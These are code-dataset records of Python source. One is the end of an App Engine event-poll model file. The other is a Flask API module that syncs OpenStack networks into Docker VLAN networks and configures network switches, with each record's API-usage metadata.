user[\"id\"],\n\t\t\t\t\t\t\t img_url = user[\"img_url\"]))\n\tkey = event.put();\n\treturn event\n\n\ndef addSelection(user_selection, user_poll, url_key):\n\tevent = ndb.Key(urlsafe=url_key)\n\tevent = event.get()\n\tfor poll in event.polls:\n\t\tif poll.name == user_poll:\n\t\t\tduplicate = False\n\t\t\tfor selection in poll.selections:\n\t\t\t\tif selection.name == user_selection:\n\t\t\t\t\tduplicate = True\n\t\t\tif not duplicate:\n\t\t\t\tpoll.selections.append(Selection(name = user_selection,\n\t\t\t\t\t\t\t\t\t\t\t \t people = []))\n\n\tkey = event.put();\n\treturn event\n\ndef addVote(user, user_selection, user_poll, url_key):\n\tevent = ndb.Key(urlsafe=url_key)\n\tevent = event.get()\n\tfor poll in event.polls:\n\t\tif poll.name == user_poll:\n\t\t\tfor selection in poll.selections:\n\t\t\t\tif selection.name == user_selection:\n\t\t\t\t\tselection.people.append(User(name = user[\"name\"],\n\t\t\t\t\t\t\t \t\t\t\t\t fb_id = user[\"id\"],\n\t\t\t\t\t\t\t \t\t\t\t\t img_url = user[\"img_url\"]))\n\n\tkey = event.put();\n\treturn event\n\ndef removeVote(user, user_selection, user_poll, url_key):\n\tevent = ndb.Key(urlsafe=url_key)\n\tevent = event.get()\n\tfor poll in event.polls:\n\t\tif poll.name == user_poll:\n\t\t\tfor selection in poll.selections:\n\t\t\t\tif selection.name == user_selection:\n\t\t\t\t\tuser_obj = User(name = user[\"name\"],\n\t\t\t\t\t\t\t \t\tfb_id = user[\"id\"],\n\t\t\t\t\t\t\t \t\timg_url = user[\"img_url\"])\n\t\t\t\t\tselection.people.remove(user_obj)\n\n\tkey = event.put();\n\treturn event\n\n", 
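One detail of the ebModels code above worth calling out: removeVote builds a fresh User(...) and hands it to list.remove(), which works because ndb model instances compare by property values rather than identity. The same idea, distilled with a stdlib dataclass so it runs outside App Engine (purely illustrative; UserLike is a made-up stand-in):

from dataclasses import dataclass

@dataclass
class UserLike:
    name: str
    fb_id: str
    img_url: str

people = [UserLike('Ann', '1', 'a.png'), UserLike('Bob', '2', 'b.png')]
# list.remove() compares with ==, and @dataclass compares field values,
# so a freshly constructed object with the same fields removes Bob --
# the same trick removeVote() relies on with ndb's value-based equality
people.remove(UserLike('Bob', '2', 'b.png'))
assert people == [UserLike('Ann', '1', 'a.png')]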
"repo_name": "nearalias/EventBox", "sub_path": "ebModels.py", "file_name": "ebModels.py", "file_ext": "py", "file_size_in_byte": 3445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "google.appengine.ext.ndb.Model", "line_number": 4, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 4, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 5, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 5, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 6, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 6, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 7, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 7, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Model", "line_number": 9, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 9, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 10, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 10, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StructuredProperty", "line_number": 11, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 11, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Model", "line_number": 13, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 13, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 14, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 14, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.LocalStructuredProperty", "line_number": 15, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 15, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Model", "line_number": 17, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 17, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 18, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 18, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 19, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 19, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 20, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 20, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 21, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 21, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 22, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 22, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StructuredProperty", "line_number": 23, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 23, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.LocalStructuredProperty", "line_number": 24, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 24, "usage_type": "name"}, {"api_name": 
"google.appengine.ext.ndb.Key", "line_number": 46, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 46, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 67, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 67, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 71, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 71, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 81, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 81, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 97, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 97, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 111, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 111, "usage_type": "name"}]} +{"seq_id": "16181604769", "text": "# encoding=utf-8\nimport json\nimport logging\n\nfrom flask import jsonify\nfrom flask_restful import marshal\nfrom sqlalchemy import and_\nimport socket, struct\nfrom IPy import IP\nimport copy\nimport json\nfrom threading import Thread\n\nimport smurf.config as config\nfrom .common import NETWORK_FIELDS\nfrom smurf.api_requests.api_requests import post_http, delete_http, get_http\nfrom smurf.db.models import db_session, Network, VlanIpAddress\nimport smurf.auth as auth\nfrom smurf.utils import exec_cmd, get_token\nfrom smurf.db.openstack_db import NetworkSegments\nfrom smurf.api_requests.switch_config import SwitchConfig\nfrom smurf.api_requests.sdn_switch_config import PyjsonrpcClient\n\nlogger = logging.getLogger(__name__)\n\n\nclass NetworkListAPI(auth.X_resource):\n \"\"\"\n this is Network list plugins\n \"\"\"\n\n def get(self):\n \"\"\"\n method to get Network by user id\n \"\"\"\n if not self.result.get(\"success\"):\n return self.result\n user_id = self.context.get('user_id')\n networks = Network.query.filter(Network.removed == None).all()\n if not networks:\n em = \"no networks\"\n return {\"error\": [{\"code\": 401, \"msg\": \"{0}\".format(em)}]}\n allowed_networks = [network for network in networks if network.user_id == user_id]\n\n return {\"networks\": [marshal(network, NETWORK_FIELDS) for network in allowed_networks]}\n\n def post(self):\n \"\"\"\n method to sync Network from OpenStack's user define network\n \"\"\"\n if not self.result.get(\"success\"):\n return self.result\n try:\n # description = self.args.get(\"description\")\n user_id = self.context.get('user_id')\n\n # get user's all networks from OpenStack\n openstack_networks = get_user_networks(self.token)\n if not openstack_networks:\n return False, 500\n # get user's all network from docker(smurf)\n docker_networks = Network.query.filter(Network.user_id == user_id).all()\n if not docker_networks:\n invalid_nets = []\n else:\n invalid_nets = copy.copy(docker_networks)\n for openstack_network in openstack_networks:\n network_id = openstack_network\n subnet_ids = openstack_networks.get(network_id).get(\"sub_nets\")\n status = openstack_networks.get(network_id).get(\"status\")\n # get network's vni\n networksegment = NetworkSegments.query.filter(NetworkSegments.network_id == network_id).first()\n if networksegment is None:\n em = \"could not be find network's vni id from openstack. 
network id: {0}\".format(network_id)\n logger.info(em)\n return False, 500\n vni = networksegment.segmentation_id\n # if network has no Vxlan id. the container can not use that network\n if not vni:\n continue\n # generate uniqueness vlan id\n networks = Network.query.filter(Network.vlan != None).all()\n vlan_id = set(range(config.vlan_range[0], config.vlan_range[1])).difference(\n set([network.vlan for network in networks])).pop()\n if not vlan_id:\n em = 'no available vlan id allocation'\n logger.warn(em)\n return False, 500\n for subnet_id in subnet_ids:\n ret = [s for s in docker_networks if s.network_id == network_id and s.subnet_id == subnet_id]\n # if not found network in docker platform. add the network in docker platform\n data = get_subnet(self.token, subnet_id)\n if not data:\n return False, 500\n cidr = data.get('subnet').get('cidr')\n gateway = data.get('subnet').get('gateway_ip')\n name = data.get('subnet').get(\"name\")\n if not ret:\n # get openstack network's info\n # get subnet cidr and gateway\n network = Network(name=name, description=None, user_id=user_id, vlan=vlan_id, vni=vni,\n network_id=network_id, subnet_id=subnet_id, cidr=cidr, gateway=gateway,\n status=status)\n db_session.add(network)\n db_session.flush()\n else:\n Network.query.filter(and_(Network.network_id == network_id,\n Network.subnet_id == subnet_id)).update({Network.name: name,\n Network.status: status,\n Network.cidr: cidr,\n Network.gateway: gateway})\n # db_session.flush()\n db_session.commit()\n # if found network in docker platform. update network info\n # exclude OpenStack's networks from docker db. it is invalid networks\n invalid_nets = [s for s in invalid_nets if s.subnet_id != subnet_id and s.network_id != network_id]\n\n # delete invalid nets\n for invalid_net in invalid_nets:\n # remove network if is created on docker\n if invalid_net.iscreated:\n # subnet id is the docker network name\n net_name = invalid_net.subnet_id\n VlanNetworkManager.delete_network(net_name)\n Network.query.filter(and_(Network.network_id == invalid_net.network_id,\n Network.subnet_id == invalid_net.subnet_id)).delete()\n db_session.flush()\n\n db_session.commit()\n return True, 200\n except Exception as e:\n db_session.rollback()\n em = \"cannot sync network from OpenStack. 
msg: {0}\".format(e)\n logger.warn(em)\n return False, 500\n\n def delete(self, name):\n \"\"\"\n method to delete a Network\n \"\"\"\n if not self.result.get(\"success\"):\n return self.result\n\n user_id = self.context.get('user_id')\n exist_network = Network.query.filter(and_(Network.name == name, Network.removed == None)).first()\n if not exist_network:\n em = 'Network {0} is not exist'.format(name)\n logger.info(em)\n return {\"error\": [{\"code\": 401, \"msg\": \"{0}\".format(em)}]}\n network = Network.query.filter(\n and_(Network.user_id == user_id, Network.name == name)).first()\n try:\n # when delete a network we must recycling ports from openstack\n VlanIpaddress = VlanIpAddress.query.filter(VlanIpAddress.network_id == network.id).all()\n # recycling ports from openstack\n if VlanIpaddress:\n for VlanIpaddres in VlanIpaddress:\n ret = delete_port(self.token, VlanIpaddres.port_id)\n if ret.get(\"error\"):\n return ret\n db_session.delete(VlanIpaddres)\n db_session.flush()\n db_session.delete(network)\n db_session.commit()\n return {\"success\": [{\"code\": 200, \"msg\": \"\"}]}\n except Exception as e:\n em = \"Unable to delete network: {0}\".format(e)\n logger.warn(em)\n return {\"error\": [{\"code\": 500, \"msg\": \"{0}\".format(em)}]}\n\n def put(self):\n \"\"\"\n update a network\n \"\"\"\n if not self.result.get(\"success\"):\n return self.result\n\n name = self.args.get('name')\n user_id = self.context.get('user_id')\n n_name = self.args.get('n_name')\n description = self.args.get('description')\n data = {}\n if n_name:\n data.update({'name': n_name})\n if description:\n data.update({'description': description})\n\n exist_network = Network.query.filter(and_(Network.name == name,\n Network.removed == None,\n Network.user_id == user_id)).first()\n if not exist_network:\n em = 'Network {0} is not exist'.format(name)\n logger.info(em)\n return {\"error\": [{\"code\": 401, \"msg\": \"{0}\".format(em)}]}\n try:\n Network.query.filter(and_(Network.user_id == user_id,\n Network.name == name)).update(data)\n db_session.commit()\n return {'ec': 0, 'em': 'success'}\n except Exception as e:\n db_session.rollback()\n logger.warn('Unable to update networke, user id=`%s` name=`%s`' % (user_id, name))\n return {\"error\": [{\"code\": 500, \"msg\": \"{0}\".format(e)}]}\n\n\ndef GetPortAbout(network_id, subnet_id, mac_address, tenant_id):\n \"\"\"\n method to get network's ip address from openstack \n :param token: \n :param network_id: \n :param subnet_id: \n :return: \n \"\"\"\n # get the admin token\n token = get_token()\n if not token:\n em = \"get admin token error......\"\n logger.warn(em)\n if not config.controler_host or not config.neutron_api_port:\n em = \"keystone_host or neutron_api_port is not configured\"\n logger.warn(em)\n return {\"error\": [{\"code\": 500, \"msg\": \"{0}\".format(em)}]}\n url = 'http://{0}:{1}/v2.0/ports'.format(config.controler_host, config.neutron_api_port)\n\n if not network_id or not subnet_id:\n em = \"invalid parameter network_id or subnet_id\"\n logger.warn(em)\n return {\"error\": [{\"code\": 500, \"msg\": \"{0}\".format(em)}]}\n\n bind_host = config.overlay_ip.replace(\".\", \"-\")\n # data = {\"port\": {\"network_id\": network_id,\n # \"fixed_ips\": [{\"subnet_id\": subnet_id}],\n # \"mac_address\": mac_address, \"device_owner\": \"neutron:LOADBALANCERV2\"}}\n\n data = {\"port\": {\"network_id\": network_id,\n \"tenant_id\": tenant_id,\n \"fixed_ips\": [{\"subnet_id\": subnet_id,\n }\n ],\n \"mac_address\": mac_address,\n \"binding:host_id\": 
bind_host,\n \"device_owner\": \"compute:nova\"\n }\n }\n data = json.dumps(data)\n\n header = {'Content-type': 'application/json', 'X-Auth-Token': token.strip()}\n ret = post_http(url=url, data=data, headers=header)\n # check is it error\n if ret.status_code != 201:\n em = \"openstack error.assign ip address from openstack error\"\n logger.warn(em)\n return {\"error\": [{\"code\": 400, \"msg\": \"{0}\".format(em)}]}\n return ret.json()\n\n\ndef delete_port(token, port_id):\n if not token or not port_id:\n em = \"token or port_id is invalid\"\n return {\"error\": [{\"code\": 400, \"msg\": \"{0}\".format(em)}]}\n header = {'X-Auth-Token': token.strip()}\n url = \"http://{0}:{1}/v2.0/ports/{2}\".format(config.controler_host,\n config.neutron_api_port,\n port_id.strip())\n ret = delete_http(url=url, headers=header)\n # check is it error\n if ret.status_code != 204:\n em = \"error delete port with id :{0}. code: <{1}>\".format(port_id, ret.status_code)\n return {\"error\": [{\"code\": 400, \"msg\": \"{0}\".format(em)}]}\n return {\"success\": [{\"code\": 200, \"msg\": \"\"}]}\n\n\ndef get_subnet(token, subnet_id):\n \"\"\"\n method to get subnet info from openstack\n :param token: \n :param subnet_id: \n :return: \n \"\"\"\n if not token or not subnet_id:\n em = \"token or subnet_id is invalid\"\n return {\"error\": [{\"code\": 400, \"msg\": \"{0}\".format(em)}]}\n header = {'X-Auth-Token': token.strip()}\n url = \"http://{0}:{1}/v2.0/subnets/{2}\".format(config.controler_host,\n config.neutron_api_port,\n subnet_id)\n ret = get_http(url=url, headers=header)\n # check is it error\n if ret.status_code != 200:\n return {}\n return ret.json()\n\n\nclass VlanNetworkManager(object):\n \"\"\"\n docker network Manager\n \"\"\"\n cmd_prefix = [\"docker network\"]\n\n @staticmethod\n def create_network(cidr, vlanID, name, gateway=None):\n \"\"\"\n method to add a vlan network\n :return: \n \"\"\"\n ip, mask = cidr.split('/')\n net_obj = IpExpr(ip, int(mask))\n start, end = net_obj.net_start, net_obj.net_end\n\n args = [\"create\",\n \"-d vlcp\",\n \"--ipam-driver vlcp\",\n \"--subnet {0}\".format(cidr),\n \"-o physicalnetwork=vlan\",\n \"-o vlanid={0}\".format(vlanID),\n \"-o subnet:allocated_start={0}\".format(start),\n \"-o subnet:allocated_end={0}\".format(end),\n \"{0}\".format(name)\n ]\n if gateway:\n gw_list = \"--gateway {0}\".format(gateway)\n args.insert(4, gw_list)\n full_args = VlanNetworkManager.cmd_prefix + args\n ret = exec_cmd(full_args)\n return ret\n\n @staticmethod\n def delete_network(name):\n \"\"\"\n method to delete a vlan network\n :return: \n \"\"\"\n args = [\"rm\",\n \"{0}\".format(name)\n ]\n full_args = VlanNetworkManager.cmd_prefix + args\n ret = exec_cmd(full_args)\n return ret\n\n\ndef get_user_networks(token):\n \"\"\"get user's all network from OpenStack\"\"\"\n if not token:\n em = \"invalid token\"\n logger.info(em)\n networks = {}\n headers = {'X-Auth-Token': token.strip()}\n ret = get_http(url=config.network_ep, headers=headers)\n if ret.status_code != 200:\n em = \"get network error.....\"\n logger.warn(em)\n return {}\n for network in ret.json()[\"networks\"]:\n mtu = network.get(\"mtu\")\n if mtu and mtu == 1450:\n net_id = network.get(\"id\")\n net_name = network.get(\"name\")\n sub_nets = network.get(\"subnets\")\n status = network.get(\"status\")\n networks[net_id] = {\"name\": net_name, \"sub_nets\": sub_nets, \"status\": status}\n return networks\n\n\nclass IpExpr(object):\n def __init__(self, ip, mask):\n self.ip = ip\n self.mask = mask\n self.network = 
self.get_network()\n        self.broadcast = self.get_broadcast()\n        self.net_int = self.get_net_int()\n        self.dhcp_listen_addr = self.get_dhcp_listen_addr()\n        self.available_ips = self.get_available_ips()\n        self.gateway = self.get_gateway()\n        self.net_start = self.get_start()\n        self.net_end = self.get_end()\n\n    def get_network(self):\n        network = str(IP(self.ip).make_net(self.mask)).split('/')[0]\n        return network\n\n    def get_broadcast(self):\n        broadcast = IP('{}/{}'.format(self.network, self.mask)).broadcast()\n        return broadcast\n\n    def get_net_int(self):\n        net_int = socket.ntohl(struct.unpack(\"I\", socket.inet_aton(self.network))[0])\n        return net_int\n\n    def get_dhcp_listen_addr(self):\n        dhcp_listen_addr = socket.inet_ntoa(struct.pack('I', socket.htonl(self.net_int + 1)))\n        return dhcp_listen_addr\n\n    def get_available_ips(self):\n        available_ips = 2 ** (32 - self.mask) - 2\n        return available_ips\n\n    def get_gateway(self):\n        gateway = socket.inet_ntoa(struct.pack('I', socket.htonl(self.net_int + self.available_ips)))\n        return gateway\n\n    def get_start(self):\n        \"\"\"by default return network + 2 (eg. 192.168.0.0/24 returns 192.168.0.2)\"\"\"\n        start = socket.inet_ntoa(struct.pack('I', socket.htonl(self.net_int + 2)))\n        return start\n\n    def get_end(self):\n        \"\"\"by default return broadcast - 2 (eg. 192.168.0.0/24 returns 192.168.0.253)\"\"\"\n        end = socket.inet_ntoa(struct.pack('I', socket.htonl(self.net_int + self.available_ips - 1)))\n        return end\n\n\nclass ConfigureSdnSwitch(auth.X_resource):\n    def post(self):\n        try:\n            if not self.result.get(\"success\"):\n                return self.result\n            network_id = self.args.get('network_id').strip()\n            sw_ip = self.args.get('sw_ip').strip()\n            sw_pwd = self.args.get('sw_pwd').strip()\n            sw_user = self.args.get('sw_user').strip()\n            network = Network.query.filter(Network.network_id == network_id).first()\n            if not network:\n                em = \"cannot find network. id: <{0}>\".format(network_id)\n                logger.warn(em)\n                return 400\n            vlan = network.vlan\n            vni = network.vni\n            if not network.iscreated:\n                task = Thread(target=lambda: ConfigureSdnSwitch.add_vtep(sw_ip, sw_user, sw_pwd, vlan, vni))\n                task.setDaemon(True)\n                task.start()\n            return {\"success\": {\"code\": 200, \"msg\": \"\"}}\n        except Exception as e:\n            db_session.rollback()\n            em = \"config sdn switch error. msg: <{0}>\".format(e)\n            logger.warn(em)\n            return 500\n\n    def delete(self):\n        try:\n            if not self.result.get(\"success\"):\n                return self.result\n            network_id = self.args.get('network_id')\n            sw_ip = self.args.get('sw_ip')\n            sw_pwd = self.args.get('sw_pwd')\n            sw_user = self.args.get('sw_user')\n            network = Network.query.filter(Network.network_id == network_id).first()\n            if not network:\n                em = \"cannot find network. id: <{0}>\".format(network_id)\n                logger.warn(em)\n                return 400\n            vlan = network.vlan\n            if network.iscreated:\n                task = Thread(target=lambda: ConfigureSdnSwitch.delete_vtep(sw_ip, sw_user, sw_pwd, vlan, network_id))\n                task.setDaemon(True)\n                task.start()\n            return {\"success\": {\"code\": 200, \"msg\": \"\"}}\n        except Exception as e:\n            em = \"delete vtep error. msg: <{0}>\".format(e)\n            logger.warn(em)\n            return 500\n\n    @staticmethod\n    def add_vtep(sw_ip, sw_user, sw_pwd, vlan, vni):\n        try:\n            sdn_switch_obj = PyjsonrpcClient(sw_ip, username=sw_user, password=sw_pwd)\n            vteps = sdn_switch_obj.get_vteps()\n            if vteps.get(\"error\"):\n                return vteps\n            for vtep_index, vtep_ip in vteps.iteritems():\n                sdn_switch_obj.add_vni_mapping(vlan, vni, vtep_index)\n        except Exception as e:\n            em = \"config sdn switch error. 
msg: <{0}>\".format(e)\n logger.warn(em)\n return 500\n\n @staticmethod\n def delete_vtep(sw_ip, sw_user, sw_pwd, vlan, network_id):\n try:\n sdn_switch_obj = PyjsonrpcClient(sw_ip, username=sw_user, password=sw_pwd)\n vteps = sdn_switch_obj.get_vteps()\n if vteps.get(\"error\"):\n return vteps\n for vtep_index, vtep_ip in vteps.iteritems():\n sdn_switch_obj.delete_vni_mapping(vlan, vtep_index)\n Network.query.filter(Network.network_id == network_id).update({Network.iscreated: False})\n db_session.commit()\n except Exception as e:\n db_session.rollback()\n em = \"delete vtep error. msg: <{0}>\".format(e)\n logger.warn(em)\n return 500\n\n\nclass ConfigureL2Switch(auth.X_resource):\n def post(self):\n try:\n if not self.result.get(\"success\"):\n return self.result\n network_id = self.args.get('network_id').strip()\n sw_ip = self.args.get('sw_ip').strip()\n sw_port = self.args.get('sw_port').strip()\n sw_pwd = self.args.get('sw_pwd').strip()\n sw_user = self.args.get('sw_user').strip()\n network = Network.query.filter(Network.network_id == network_id).first()\n if not network:\n em = \"can not fond network. id: <{0}>\".format(network_id)\n logger.warn(em)\n return 400\n vlan = network.vlan\n ConfigureL2Switch.set_port_access(sw_ip, sw_user, sw_pwd, sw_port, vlan)\n return 200\n except Exception as e:\n em = \"config l2 switch error ip: <{0}> msg: <{1}>\".format(sw_ip, e)\n logger.warn(em)\n return 500\n\n def delete(self):\n try:\n if not self.result.get(\"success\"):\n return self.result\n network_id = self.args.get('network_id').strip()\n sw_ip = self.args.get('sw_ip').strip()\n sw_port = self.args.get('sw_port').strip()\n sw_pwd = self.args.get('sw_pwd').strip()\n sw_user = self.args.get('sw_user').strip()\n network = Network.query.filter(Network.network_id == network_id).first()\n if not network:\n em = \"can not fond network. 
id: <{0}>\".format(network_id)\n logger.warn(em)\n return 400\n ConfigureL2Switch.set_port_access(sw_ip, sw_user, sw_pwd, sw_port, vlan=4094)\n except Exception as e:\n em = \"config l2 switch error ip: <{0}> msg: <{1}>\".format(sw_ip, e)\n logger.warn(em)\n return 500\n\n @staticmethod\n def set_port_access(sw_ip, sw_user, sw_pwd, sw_port, vlan):\n sw_obj = SwitchConfig(ip=sw_ip, port=23, username=sw_user, password=sw_pwd, timeout=5)\n sw_obj.set_access(sw_port, vlan)\n\n @staticmethod\n def set_port_down(sw_ip, sw_user, sw_pwd, sw_port):\n sw_obj = SwitchConfig(ip=sw_ip, port=23, username=sw_user, password=sw_pwd, timeout=5)\n sw_obj.set_down(sw_port)\n\n @staticmethod\n def set_port_up(sw_ip, sw_user, sw_pwd, sw_port):\n sw_obj = SwitchConfig(ip=sw_ip, port=23, username=sw_user, password=sw_pwd, timeout=5)\n sw_obj.set_up(sw_port)\n", "repo_name": "freedomsunny/smurf", "sub_path": "smurf/resources/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 22323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "smurf.auth.X_resource", "line_number": 27, "usage_type": "attribute"}, {"api_name": "smurf.auth", "line_number": 27, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 39, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 39, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.removed", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask_restful.marshal", "line_number": 45, "usage_type": "call"}, {"api_name": "common.NETWORK_FIELDS", "line_number": 45, "usage_type": "argument"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 62, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 62, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 62, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.user_id", "line_number": 62, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 66, "usage_type": "call"}, {"api_name": "smurf.db.openstack_db.NetworkSegments.query.filter", "line_number": 72, "usage_type": "call"}, {"api_name": "smurf.db.openstack_db.NetworkSegments.query", "line_number": 72, "usage_type": "attribute"}, {"api_name": "smurf.db.openstack_db.NetworkSegments", "line_number": 72, "usage_type": "name"}, {"api_name": "smurf.db.openstack_db.NetworkSegments.network_id", "line_number": 72, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 82, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 82, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.vlan", "line_number": 82, "usage_type": "attribute"}, {"api_name": "smurf.config.vlan_range", "line_number": 83, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 83, "usage_type": "name"}, {"api_name": "smurf.db.models.Network", "line_number": 101, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session.add", "line_number": 104, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 104, "usage_type": "name"}, {"api_name": 
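As an aside on the IpExpr class above: the struct/socket round-trip it relies on is easiest to see on one concrete prefix. A minimal standalone sketch, using only the Python standard library (none of these names come from the smurf repo itself):

# Standalone sketch of the address arithmetic IpExpr performs for 192.168.0.0/24.
import socket
import struct

network, mask = "192.168.0.0", 24
# bytes in network order -> native int -> host-order int (same trick as get_net_int)
net_int = socket.ntohl(struct.unpack("I", socket.inet_aton(network))[0])

def to_addr(host_int):
    # inverse conversion: host-order int back to a dotted quad
    return socket.inet_ntoa(struct.pack("I", socket.htonl(host_int)))

available = 2 ** (32 - mask) - 2             # 254 usable hosts
print(to_addr(net_int + 1))                  # 192.168.0.1   (dhcp listen addr)
print(to_addr(net_int + 2))                  # 192.168.0.2   (allocated_start)
print(to_addr(net_int + available - 1))      # 192.168.0.253 (allocated_end)
print(to_addr(net_int + available))          # 192.168.0.254 (gateway)

For 192.168.0.0/24 this reproduces the values IpExpr derives: .1 for the dhcp listener, .2/.253 for the allocation window, and .254 for the gateway.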
"smurf.db.models.db_session.flush", "line_number": 105, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 105, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 107, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 107, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 107, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 107, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 107, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.subnet_id", "line_number": 108, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 108, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.name", "line_number": 108, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.status", "line_number": 109, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 109, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.cidr", "line_number": 110, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 110, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.gateway", "line_number": 111, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 111, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.commit", "line_number": 113, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 113, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 125, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 125, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 125, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 125, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.subnet_id", "line_number": 126, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 126, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.flush", "line_number": 127, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 127, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.commit", "line_number": 129, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 129, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.rollback", "line_number": 132, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 132, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 145, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 145, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 145, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 145, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.name", "line_number": 145, "usage_type": "attribute"}, {"api_name": 